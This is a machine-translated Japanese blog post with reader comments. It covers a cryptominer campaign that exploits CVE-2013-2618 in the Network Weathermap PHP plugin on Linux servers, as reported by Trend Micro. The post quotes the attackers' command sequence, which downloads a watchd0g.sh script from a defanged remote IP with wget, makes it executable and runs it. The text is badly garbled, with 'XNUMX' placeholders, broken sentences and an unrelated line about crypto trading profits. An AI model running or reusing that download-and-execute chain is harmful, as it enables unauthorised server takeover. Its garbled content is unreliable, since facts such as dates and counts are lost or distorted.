これから 暗号通貨マイナー リモートコンピュータを使用して 許可なく これらの所有者の割合がトレンドになりつつあります。 この種の状況については、ブログで何度か話しました。
そして、これは暗号通貨がその瞬間からすでに完全に制御不能になっているということです かなりの場所と価値を持っています、セキュリティに違反するコンピュータにアクセスするのに十分な知識を持っている人々は、金銭的利益を得るために重要な情報や銀行口座を探すのに時間を無駄にしています。
これを行う代わりに、彼らは最も簡単な方法を選択します。これらのチームを制御し、マイニングネットワークで統合し、ボットネットで一般的に行う他のタスクも実行します。
このように、通常は番号を付け直す方が多くなります。 彼らはこれが生み出すインスタントマネーにのみ焦点を合わせています。
市場動向の賢明な理解と暗号取引の適切な知識により、大きな利益を得ることができます。
Linuxは本当に安全なシステムですか?
私たちの多くは、Linuxはほぼ完璧な安全なオペレーティングシステムであるという考えを持っていますが、現実にはまだいくつかの欠陥があります。
よく持っていますトレンドマイクロが発見した日、 明らかにした 新しい ハッカーに暗号通貨をマイニングする利点を与えたLinuxシステムの欠陥 Linuxサーバーとマシンを使用します。
あなたのブログを通しての声明の中で 彼らは次のようにコメントしました:
インシデント対応に関連する監視を通じて、JenkinsMinerマルウェアを使用した以前の暗号通貨マイニングキャンペーンと相関させることができた指標を持つ侵入の試みを観察しました。
違い:このキャンペーンはLinuxサーバーを対象としています。 これは、再利用された脆弱性の典型的なケースでもあり、パッチがほぼXNUMX年間利用可能であった古いセキュリティ上の欠陥を悪用します。
このリリースでは、分析を通じて 影響を受けたサイトを特定することができました この失敗のために 主に日本、台湾、中国、米国、インドに影響を及ぼします。
攻撃分析
分析を通じて トレンドマイクロのスマートプロテクションネットワーク 攻撃者がこの欠陥をどのように利用するかについて少し詳しく説明します。
このキャンペーンの運営者は、システム管理者がネットワークアクティビティを視覚化するために使用するCamapi NetworkWeathermapプラグインの古い脆弱性であるCVE-2013-2618を悪用していました。
彼らが古いセキュリティ上の欠陥を悪用している理由については、Network Weathermapには、2014年XNUMX月以降、これまでにXNUMXつの脆弱性しか公開されていません。
これらの攻撃者は、エクスプロイトが利用可能なセキュリティ上の欠陥だけでなく、オープンソースツールを使用している組織で発生するパッチの遅延も利用している可能性があります。
基本的に 攻撃はXSS攻撃によるものです。
あいまいな部分は、攻撃対象、つまりポートを備えたWebサーバーです。
ファイル /plugins/weathermap/configs/conn.php に対する永続的なXSS攻撃の結果であるファイルです /プラグイン/ウェザーマップ/ php .
プラス conn.php 最初は、同様のHTTPリクエストが 'というページに適用されています Cools.php '。
暗号通貨をマイニングするプログラムは、脆弱性を通じて配布されます LinuxサーバーであるターゲットのPHP天気図から
この画像では、攻撃がどのように生成されるかを確認でき、次のように説明されています。
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
これは、wgetを使用してファイルをダウンロードするように指示を送信します。これは、ほとんどすべてのLinuxディストリビューションがデフォルトでインストールしているユーティリティです。
chmod 775 watchd0g.sh
ファイルを実行可能にします
./watchd0g.sh
最終的に行うことは、ファイルをサーバー上で実行することです。
幸いなことに、 すでにパッチがあります ( CVE-2013-2618 )障害が発生した場合に利用可能 あなたはそれをダウンロードすることができます から このリンクをクリックします。
Si あなたはそれについてもっと知りたい この失敗については、このリンクにアクセスしてください。
出典 PHP Weathermapの脆弱性を介して配布された暗号通貨マイナー、Linuxサーバーを対象
馬鹿であることは安全ではありません、そしてそれにもかかわらずLinuxはあなたを救います。
セキュリティパッチを更新しないことはLinuxのせいではありません。 一部の企業が、お金を節約するために、システム管理者として馬鹿を雇うのは欠点です。
しかし、それでも、それは即座に検出され、すぐに解決されます。このようなマイナーなセキュリティインシデントも公開されます。
そして、Linuxのアップデートが適用されないという欠点は何ですか? GNU / Linux開発者は、新たな脆弱性に対するソリューションを開発し、それらをユーザーが利用できるようにすることで、その使命を果たします。 医者がインフルエンザワクチンを処方し、あなたがそれを受け取らなかった場合、あなたは病気になり、硬直します…それは医者のせいですか?
DesdeLinux それは本来のものではなく、2 つの重要な間違いを含む 2 つのニュース記事が連続して掲載されました。
1.-開発するためのより良い編集者に彼らはフリーソフトウェアではないものを置き、彼らはフリーソフトウェアである他のものを忘れます(彼らはコメントで引用されています)。
2.-ウイルスが更新されていないサーバーにのみ影響する場合のウイルスに関する膨大なニュース。 しかし、Linuxがデフォルトで何十年も更新されている場合。 Windowsスタイルの吸うアンチウイルスが必要であるかのように恐れを置くこと。 彼らは、LinuxはWindowsと同じであり、そうではないと言っているようです。
バグが古く、すでにパッチが適用されている場合、それはニュースでも何でもありません。 マイクロソフトやトレンドマイクロ、ノートン、パンダ、マカフィーなどのウイルス対策会社をプレイしたり、支払いを受けたりしないでください。
ちなみに、私たちは会社で数年間トレンドマイクロを使用していましたが、実行可能ファイルにはウイルスの「痕跡」が含まれているとシステムが言っていたので、それは本物のジャガイモでした。そうではありません)そしてなぜそれを削除したのか(それはディレクトリに移動したので実行されませんでした)、その使用を許可しませんでした、そして私たちが使用する必要のある安全な実行可能ファイルでこの動作のブロックを解除するためのホワイトリストがありませんでした。 たわごとに行きます。 これは企業バージョンでしたが、個人バージョンにはこのホワイトリストの可能性がありました。 哀れな。
自分をそんなに優雅に描写しないでください。
この記事では、プログラムを入力して実行可能にし、実行できるセキュリティホールについて説明しています。これは、すべてのウイルスが拡散する必要のあるセキュリティホールであり、明らかに、プログラムがコードに含める必要のあるウイルスです。ネットワーク上のコンピュータをスキャンして、操作と自己コピーを繰り返す可能性。 Linuxでは発見されたセキュリティホールがセキュリティパッチでカバーされているため、正確にはこれを行いません。アンチウイルスは必要ないので、WindowsとLinuxの違いは、ホールをカバーするためです。 Windowsでは、いくつかの理由でより困難です。1.-ファイルは拡張子だけで実行可能になり、影響を受けるコンピューターにファイルを導入する手順が不要になります。 2.-ユーザーは、プロプライエタリであり、料金を支払わずにプログラムを入手する必要があるため、疑わしい起源のプログラムを継続的にインストールしています(MS Office、Photoshopなどを購入するのが家庭経済にとって何であるかについては何も言っていません...コンピュータ機器のコスト)。 3.-遅かれ早かれWindowsがフラッシュし、ユーザーはそれを隣人、友人、...に持っていきます。彼らは時間を無駄にしないためにすべてをフォーマットし、更新されていない、またはパッチが適用されたアクティベーションパッチで究極のWindowsをインストールしますそれ自体がスパイプログラムを置きます。 そうではなく、すばらしいことかもしれませんが、そうである可能性があり、Windowsがパスワードをスパイしている可能性があります。 記事では、脆弱性の影響を受けるLinuxの導入システムについて言及しています。ネットワークを自動的にスキャンし、それを使用してサーバー上でコピーして実行するプログラムを作成することは、すべての中で最も簡単な部分です。そのため、記事の中で最もウイルスにとって重要なステップ:攻撃に対するシステムの脆弱性を知ること。
悪い情報。 これはLinuxのバグではなく、PHPアプリケーションのバグです。つまり、マルチプラットフォームです。 Linuxカーネルを実行しているシステムだけに限定されているわけではありません。 ただし、アプリケーションがクロスプラットフォームでなくても、Linuxのバグではなく、単なるアプリケーションになります。
Linuxカーネルには、このようなクロスサイトスクリプティング攻撃からの保護にわずかな干渉はありません。 投稿する前に少なくともXNUMX分間調査してください。何かについて少し知っている人には、見栄えが悪くなるという真実があるからです。